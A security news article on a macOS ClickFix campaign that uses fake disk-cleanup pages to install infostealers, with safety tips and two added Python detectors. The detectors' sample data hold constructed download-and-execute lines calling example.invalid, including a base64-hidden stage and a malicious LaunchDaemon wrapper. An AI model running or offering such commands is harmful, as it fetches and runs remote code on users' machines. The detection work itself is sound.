ClickFix attacks target macOS users with fake disk cleanup guides and utility lures


A new ClickFix campaign is targeting macOS users with fake disk cleanup guides, troubleshooting posts, and system utility pages. Microsoft says the attackers trick users into copying commands into Terminal, where the commands download and run infostealing malware.

The lures appear on platforms such as Medium, Craft, Squarespace-hosted pages, and standalone websites. They claim to help users fix common Mac problems, including low disk space, but the instructions install malware instead of repairing the device.

The campaign delivers macOS infostealers such as Macsync, Shub Stealer, and AMOS. Once active, the malware can steal browser credentials, Keychain entries, iCloud data, Telegram data, media files, documents, and cryptocurrency wallet information.

Why this ClickFix campaign matters

ClickFix attacks work because they make users run the infection command themselves. The page looks like a normal support article, and the command appears to be part of a quick fix.

This makes the campaign different from a traditional malicious app download. Instead of asking users to install a suspicious app bundle, the attackers tell them to paste a command into Terminal.

Microsoft says scripts launched directly through Terminal do not go through the same Gatekeeper checks that macOS applies to apps opened through Finder. That gives attackers a reliable path to execute malicious scripts when users follow the fake instructions.

At a glance: what Microsoft found

  • Attack type: ClickFix social engineering
  • Target: macOS users
  • Main lure: Fake disk cleanup, troubleshooting, and utility instructions
  • Observed platforms: Medium, Craft, Squarespace-hosted pages, and standalone websites
  • Malware families: Macsync, Shub Stealer, and AMOS
  • Data at risk: Passwords, Keychain data, iCloud data, browser cookies, files, Telegram data, and crypto wallets
  • Persistence methods: LaunchAgents, LaunchDaemons, fake Google Update components, and hidden helper files

How the fake macOS fixes work

The attack begins when a user finds a fake support page that promises to solve a Mac issue. The page may tell the user to open Terminal and paste a command to clean disk space or install a helpful utility.

After the command runs, it retrieves more code from attacker-controlled infrastructure. Microsoft observed command chains built entirely from tools that ship with macOS, such as curl, base64, gunzip, osascript, and the shell interpreters, so nothing new has to be installed before the first stage executes.

Those scripts can fingerprint the Mac, check the keyboard locale, contact a command-and-control server, and download the next malware stage. In some cases, the malware avoids execution if it detects signs of analysis or certain regional settings.

Three campaign paths were observed

Microsoft grouped the activity into three execution paths: a loader install campaign, a script install campaign, and a helper install campaign. All three use fake user-facing instructions to start the infection.

The loader campaign downloads and runs AppleScript payloads, collects system details, and can install a fake Google Update component for persistence. The script campaign uses obfuscated AppleScript and can fall back to Telegram to locate command-and-control infrastructure.


The helper campaign downloads files named helper or update, then uses a hidden .mainhelper backdoor and .agent wrapper to maintain access. It can also install a LaunchDaemon so the backdoor starts again after reboot.

What the malware steals

  • Saved browser usernames and passwords
  • Browser cookies and profile data
  • macOS Keychain databases
  • iCloud account data
  • Telegram data
  • Documents, images, and other local files
  • Cryptocurrency wallet files and browser wallet data
  • Media files and notes
  • SSH keys and other sensitive local credentials

Crypto wallet users face added risk

The malware does more than steal existing wallet files. Microsoft found cases where the attackers replaced legitimate cryptocurrency wallet apps with trojanized versions.

Wallet apps such as Ledger Live, Trezor Suite, and Exodus were targeted in the reported activity. A victim might continue using a fake replacement app without realizing that future transactions or wallet activity could be exposed.

This makes recovery harder. Users who suspect infection should not simply remove the malware and continue using the same wallet environment. They should move funds to new wallets created on a clean device.

Apple added protections, but users still need caution

Microsoft says Apple updated XProtect signatures for this threat. It also says macOS 26.4 and later added a warning that blocks potentially malicious commands pasted into Terminal.

Apple’s security documentation explains that macOS uses layered protections such as Gatekeeper, notarization, and XProtect to prevent, block, and remediate malware. Gatekeeper also checks apps downloaded from outside the App Store when users open them.

ClickFix tries to work around user trust rather than only technical controls. If a person ignores warnings and runs commands from a random webpage, attackers may still succeed.

Figure: Reconnaissance loader with AppleScript payload delivery (Source: Microsoft)

How macOS users can stay safe

  • Never paste commands from a webpage into Terminal unless you fully trust and understand the source.
  • Use Apple’s official support pages or trusted vendor documentation for troubleshooting.
  • Keep macOS updated so Terminal paste warnings and XProtect updates stay current.
  • Do not enter your Mac password into prompts launched by unknown scripts or “cleanup” tools.
  • Be suspicious of pages promising one-command fixes for disk space, performance, or hidden system errors.
  • Check LaunchAgents and LaunchDaemons if you suspect persistence.
  • Rotate passwords and revoke sessions if an infostealer may have run.
  • Move cryptocurrency funds using a clean device and newly generated wallets.

What security teams should monitor

Organizations should watch for unusual Terminal activity, especially command lines that combine curl with base64, gunzip, osascript, dscl, or a shell interpreter. Any one of those tools is common on its own; it is the combination of download, decode, and execute in a single command that points to a ClickFix infection chain.
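As an added example, not code from Microsoft or from this article, the following Python script scores shell command lines for the tool combinations described above and in the campaign walkthrough: a download piped into base64, gunzip, osascript, or a shell, a file made executable and run in the same line, and a base64-encoded stage that is decoded and re-scored so a payload cannot hide behind an `echo | base64 -d`. The sample command lines, the rule weights, the threshold, and the example.invalid domain are all constructed for illustration.

```python
"""Score shell command lines for ClickFix-style infection chains.

Added example for this article; not Microsoft's, Apple's or VPNCentral's
code. The heuristics mirror the tool combinations the article names (curl
with base64, gunzip, osascript, dscl or a shell interpreter). The command
lines in SAMPLE_HISTORY are constructed for illustration, not captured from
the campaign; example.invalid is a reserved, non-resolving domain.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field

# (regex, weight, reason). Weights and threshold are assumptions for this
# example; tune them against your own telemetry.
RULES = [
    (r"\b(curl|wget)\b.*\|\s*(sh|bash|zsh|osascript|base64|gunzip|python3|perl)\b",
     3, "download piped into a decoder or interpreter"),
    (r"\bchmod\s+\+x\b.*&&\s*\./", 2, "file made executable and run in the same line"),
    (r"\bosascript\b", 2, "AppleScript executed from the shell"),
    (r"\bbase64\s+(-d|-D|--decode)\b", 1, "base64 decode in the chain"),
    (r"\b(gunzip|zcat|gzip\s+-d)\b", 1, "gzip decompression in the chain"),
    (r"\b(dscl|system_profiler|sw_vers)\b", 1, "host reconnaissance tool"),
    (r"(/tmp\b|/var/folders/|~/\.|\$HOME/\.)", 1, "temp or hidden path"),
    (r"\b(nohup|disown)\b", 1, "detached from the terminal"),
]
THRESHOLD = 3  # scores at or above this are worth an analyst's look


@dataclass
class Finding:
    line: str
    score: int = 0
    reasons: list = field(default_factory=list)


def _embedded_base64(line):
    """Yield decoded text for base64-looking tokens that decode to printable ASCII."""
    for tok in re.findall(r"[A-Za-z0-9+/]{24,}={0,2}", line):
        try:
            raw = base64.b64decode(tok, validate=True)
        except (binascii.Error, ValueError):
            continue
        if raw and all(32 <= b < 127 or b in (9, 10, 13) for b in raw):
            yield raw.decode("ascii")


def score_command(line, depth=2):
    """Apply RULES to the line, then to any base64 payload it carries (up to depth layers)."""
    finding = Finding(line)
    for pattern, weight, reason in RULES:
        if re.search(pattern, line):
            finding.score += weight
            finding.reasons.append(reason)
    if depth > 0:
        for decoded in _embedded_base64(line):
            inner = score_command(decoded, depth - 1)
            finding.score += inner.score
            finding.reasons.extend("decoded: " + r for r in inner.reasons)
    return finding


def scan(lines, threshold=THRESHOLD):
    """Return findings at or above threshold, in input order."""
    return [f for f in (score_command(l) for l in lines) if f.score >= threshold]


# Constructed sample shell history: three benign lines, four ClickFix-style chains.
_INNER = base64.b64encode(b"curl -s https://example.invalid/p.sh | sh").decode()
SAMPLE_HISTORY = [
    "brew update && brew upgrade",
    "sudo rm -rf ~/Library/Caches/com.example.app",
    "dscl . -read /Users/alice RealName",                    # recon alone: below threshold
    "curl -fsSL https://example.invalid/cleanup.sh | bash",
    f"echo '{_INNER}' | base64 -d | sh",                     # stage hidden behind base64
    "cd /tmp && curl -sO https://example.invalid/update && chmod +x update && ./update",
    "osascript -e 'do shell script \"curl -s https://example.invalid/a | gunzip | sh\"'",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_HISTORY):
        print(f"[{f.score}] {f.line}\n    " + "; ".join(f.reasons))
```

On a real host, feed `scan()` the command lines from your EDR's process events or from `~/.zsh_history` and `~/.bash_history`; the base64 re-scoring is what catches the `echo ... | base64 -d | sh` variant, which scores only 1 without it.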

Security teams should also monitor for suspicious LaunchAgent and LaunchDaemon creation, fake Google Update paths, compressed archives in temporary folders, and outbound HTTP POST activity to unfamiliar domains.
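As an added example, again not Microsoft's or Apple's code, this Python script parses launchd plists with the standard library and flags the persistence traits the article lists: hidden dot-path helpers like the .agent and .mainhelper files, Google Update lookalikes installed outside Google's own directory, programs in temp folders, and shell wrappers that re-download a stage with curl or osascript. It also serves the "check LaunchAgents and LaunchDaemons" advice in the user tips above. The plists are constructed in a temporary directory; the assumption that the genuine Google updater lives under Library/Google/ is this example's, not the article's.

```python
"""Audit launchd plists for ClickFix-style persistence.

Added example for this article; not Microsoft's or Apple's code. Parses
LaunchAgent/LaunchDaemon plists with plistlib and flags traits the article
associates with this campaign. The demo plists are constructed in a temp
directory; on a real Mac, point audit_dir() at ~/Library/LaunchAgents,
/Library/LaunchAgents and /Library/LaunchDaemons.
"""
import os
import plistlib
import re
import tempfile

HIDDEN = re.compile(r"(^|/)\.[^/]+")               # any dot-file path component
TEMP = re.compile(r"^(/private)?/(tmp|var/folders)/")
SHELLS = {"sh", "bash", "zsh", "osascript", "python3", "perl"}
INLINE_CHAIN = re.compile(r"\b(curl|wget|base64|gunzip|osascript)\b")
# Assumption for this example: Google's real updater installs under
# (~)/Library/Google/; a "Google Update" job pointing elsewhere is a lookalike.
GOOGLE_DIR = "/Library/Google/"


def audit_plist(path):
    """Return the reasons this launchd plist looks suspicious ([] if clean)."""
    with open(path, "rb") as fh:
        job = plistlib.load(fh)
    args = job.get("ProgramArguments") or []
    program = job.get("Program") or (args[0] if args else "")
    label = str(job.get("Label", ""))
    reasons = []
    for item in dict.fromkeys([program, *args]):      # dedupe, keep order
        if HIDDEN.search(item):
            reasons.append(f"hidden dot-path: {item}")
        if TEMP.match(item):
            reasons.append(f"program in temp dir: {item}")
    base = os.path.basename(program)
    if base in SHELLS and any(INLINE_CHAIN.search(a) for a in args[1:]):
        reasons.append(f"{base} wrapper runs an inline download/decode chain")
    if "google" in (label + program).lower() and GOOGLE_DIR not in program:
        reasons.append("Google Update lookalike outside Library/Google/")
    if reasons and (job.get("RunAtLoad") or job.get("KeepAlive")):
        reasons.append("starts at login/boot (RunAtLoad or KeepAlive)")
    return reasons


def audit_dir(directory):
    """Audit every .plist in directory; returns {filename: reasons} for flagged jobs."""
    flagged = {}
    for name in sorted(os.listdir(directory)):
        if name.endswith(".plist"):
            reasons = audit_plist(os.path.join(directory, name))
            if reasons:
                flagged[name] = reasons
    return flagged


def build_demo_dir():
    """Write constructed sample plists (one benign, three suspicious) to a temp dir."""
    d = tempfile.mkdtemp(prefix="launchd-demo-")
    samples = {
        "com.example.backup.plist": {                  # benign: signed-looking path, no chain
            "Label": "com.example.backup",
            "Program": "/usr/local/bin/backup-agent",
            "RunAtLoad": True,
        },
        "com.google.update.plist": {                   # lookalike: binary outside Library/Google/
            "Label": "com.google.update",
            "ProgramArguments": ["/Users/alice/Library/Application Support/GoogleUpdate/update"],
            "RunAtLoad": True, "KeepAlive": True,
        },
        "com.helper.agent.plist": {                    # hidden helper wrapped by /bin/sh
            "Label": "com.helper.agent",
            "ProgramArguments": ["/bin/sh", "-c", "/Users/alice/.agent"],
            "RunAtLoad": True,
        },
        "com.update.daemon.plist": {                   # wrapper that re-downloads the stage
            "Label": "com.update.daemon",
            "ProgramArguments": ["/bin/bash", "-c", "curl -s https://example.invalid/u | sh"],
            "KeepAlive": True,
        },
    }
    for name, job in samples.items():
        with open(os.path.join(d, name), "wb") as fh:
            plistlib.dump(job, fh)
    return d


def demo():
    """Build the constructed plists and audit them; returns the flagged map."""
    return audit_dir(build_demo_dir())


if __name__ == "__main__":
    for name, reasons in demo().items():
        print(name)
        for r in reasons:
            print("   -", r)
```

Cross-check the flagged files against `launchctl list` so a job that was loaded from a plist that has since been deleted does not escape notice, and treat any hit as a reason to image the machine before cleaning it.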

Microsoft also recommends user education, endpoint detection, cloud-delivered protection, tamper protection, and monitoring for unauthorized access to browser data, Keychain items, SSH keys, and cloud credentials.

FAQ

What data can the malware steal?

The malware can steal browser credentials, cookies, Keychain entries, iCloud data, Telegram data, local files, media files, and cryptocurrency wallet information.

Why does the attack use Terminal?

The attackers use Terminal because users can run commands directly. Microsoft says scripts launched through Terminal do not receive the same Gatekeeper review as app bundles opened through Finder.

What is a ClickFix attack?

A ClickFix attack tricks users into running malicious commands by presenting them as fixes for common computer problems. On macOS, the current campaign uses fake utility and disk cleanup instructions.

Which macOS malware families are involved?

Microsoft observed Macsync, Shub Stealer, and AMOS in the macOS ClickFix activity.
